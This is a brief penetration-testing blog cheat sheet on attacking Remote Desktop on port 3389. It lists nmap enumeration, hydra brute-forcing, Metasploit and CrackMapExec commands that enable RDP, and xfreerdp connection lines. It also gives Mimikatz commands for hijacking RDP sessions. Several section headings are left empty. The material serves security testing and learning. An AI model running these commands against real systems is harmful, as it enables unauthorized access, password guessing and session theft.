Home Network Penetration Testing Free Guide to RDP Penetration Testing port 3389

Free Guide to RDP Penetration Testing port 3389

Network Penetration Testing October 11, 2022 0 Comment

Welcome, today I am writing about RDP Penetration Testing fundamentals, I will explain how to enumerate Remote Desktop Service and how to use it to escalate privileges.

RDP Penetration Testing

Introduction

Enumerating RDP

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 192.168.1.131 -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp

Post Exploitation

Metasploit

use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1
exploit

CrackMapExec

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable

Connecting to RDP

xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard

#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Persistence

Credential Dumping

RDP Session Hijacking

Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Socks5 over RDP

https://github.com/nccgroup/SocksOverRDP

RDP Exploits

Bluekeep

Avatar of RFS
RFS https://www.poplabsec.com

Related Posts

SNMP Penetration Testing

SSH Penetration Testing Fundamentals

SSH Penetration Testing Fundamentals

How to Install Covenant on Kali

How to Install Covenant on Kali

NetBios Penetration Testing Fundamentals

Network Scanning Methodology

Network Scanning Methodology: Theory

FTP Penetration Testing

The Ultimate Guide to FTP Penetration Testing

Leave a Reply

Table of Contents

Index